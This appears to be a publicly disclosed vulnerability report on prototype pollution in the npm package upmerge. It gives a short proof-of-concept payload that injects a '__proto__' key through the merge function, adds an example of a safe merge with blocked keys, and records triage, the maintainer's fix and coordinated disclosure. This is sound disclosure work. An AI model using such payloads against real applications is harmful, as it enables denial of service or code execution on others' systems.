Prototype pollution attack (upmerge)
State Resolved (Closed)
Disclosed publicly 2019-02-04T07:53:24.033Z
Reported To
Weakness none
Bounty
Timeline
submitted a report to Node.js third-party modules.
2018-11-11T14:45:55.990Z

Hi team,
I would like to report a prototype pollution vulnerability in upmerge
that allows an attacker to inject properties on Object.prototype.

Module

module name: upmerge
version: 0.1.7
npm page: https://www.npmjs.com/package/upmerge

Module Description

JavaScript Object Merge and Clone for Client or Server side

Vulnerability

Vulnerability Description

This vulnerability type is similar to my report #438274.
upmerge is vulnerable to prototype pollution when it merges objects.

Steps To Reproduce:

In the following code snippet, "payload" would come from user-input (JSON data).

var upmerge = require('upmerge');
// JSON payload carrying a "__proto__" key; JSON.parse turns it into an own property
var payload = '{"__proto__":{"polluted":"upmerge_done !"}}';
var test = {};  // an unrelated object; it only inherits from Object.prototype
console.log("Before: ", test.polluted);  // undefined
upmerge.merge({},JSON.parse(payload));    // merge walks into __proto__, i.e. Object.prototype
console.log("After: ", test.polluted);   // "upmerge_done !" once Object.prototype is polluted

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Thanks!

Impact

It causes Denial of Service or RCE in some cases.

Regards,
Frans

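For contrast with the vulnerable merge in the report above, here is an added example of the defensive pattern a merge function needs: it is not upmerge's code or its fix, and the names safeMerge, isPlainObject and prototypeIsClean are assumptions for this illustration. It skips the keys through which a recursive merge can reach Object.prototype and only recurses into own plain-object slots of the target, so the same payload shape leaves Object.prototype untouched.

```javascript
// Added example (not upmerge's code): a recursive merge that refuses to walk
// into the keys that let a merge reach Object.prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Only plain objects (literal-style or null-prototype) are merged recursively;
// arrays, class instances, Dates etc. are assigned as opaque values.
function isPlainObject(value) {
  if (value === null || typeof value !== 'object' || Array.isArray(value)) return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

function safeMerge(target, source) {
  // Object.keys lists own enumerable keys; JSON.parse turns "__proto__" in
  // input into an own property, so it does show up here and must be skipped.
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue; // drop the dangerous key instead of merging it
    const value = source[key];
    if (isPlainObject(value)) {
      // Recurse only into a slot that target owns and that is a plain object;
      // otherwise start from a fresh object so nothing inherited is mutated.
      const existing =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
          ? target[key]
          : {};
      target[key] = safeMerge(existing, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection helper: true while Object.prototype has no own property `name`.
function prototypeIsClean(name) {
  return !Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Constructed sample input: the shape used in the report, plus a nested variant.
const sample = JSON.parse(
  '{"a":{"b":1},"__proto__":{"polluted":"yes"},"c":{"__proto__":{"x":1}}}'
);
const merged = safeMerge({}, sample);

console.log('merged:', JSON.stringify(merged));          // {"a":{"b":1},"c":{}}
console.log('Object.prototype clean:', prototypeIsClean('polluted')); // true
console.log('unrelated object sees:', ({}).polluted);     // undefined
```

Skipping the three keys is the minimal fix; a second layer many services add is `Object.freeze(Object.prototype)` at startup, which turns any remaining pollution attempt into a silent no-op (or a TypeError in strict mode) rather than a global change.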
vdeturckheim_dev Activities::Comment
2018-11-11T14:46:01.953Z
Hello, Thanks for reporting this to us. Someone will quickly look at this report and triage it.


dienpv Activities::Comment
2018-11-12T14:43:12.040Z
Any update?


marcinhoppe Activities::BugTriaged
2018-11-16T12:25:48.775Z
I was able to reproduce and confirm the issue as you described and will triage this report as vulnerability. I will invite the package maintainer to this issue.


jazzfog Activities::ExternalUserJoined
2018-11-19T19:43:52.800Z


jazzfog Activities::Comment
2018-11-19T19:48:32.203Z
Thanks for the report, I will check. Can you please clarify how exactly this can be harmful?


dienpv Activities::Comment
2018-11-20T01:46:02.591Z
I recommend the research by HoLyVieR, `https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf`, for understanding how this issue can be exploited.


marcinhoppe Activities::Comment
2018-11-21T10:54:18.906Z
@jazzfog Let us know when you have the fix available so we can coordinate disclosure. Also, if we can help with anything, just let us know.


marcinhoppe Activities::Comment
2018-12-07T08:05:13.198Z
@jazzfog Did you have a chance to take a look at this report?


dienpv Activities::Comment
2018-12-28T15:22:33.404Z
Hey @jazzfog


jazzfog Activities::Comment
2019-01-16T07:59:50.785Z
Hey, sorry for the delay, I landed the fix. Thanks for the report!


marcinhoppe Activities::ReportSeverityUpdated
2019-02-04T07:47:55.972Z


marcinhoppe Activities::BugResolved
2019-02-04T07:48:01.713Z


marcinhoppe Activities::Comment
2019-02-04T07:53:01.710Z
@dienpv @jazzfog I will disclose this report now.


marcinhoppe Activities::AgreedOnGoingPublic
2019-02-04T07:53:08.531Z


marcinhoppe Activities::ManuallyDisclosed
2019-02-04T07:53:23.948Z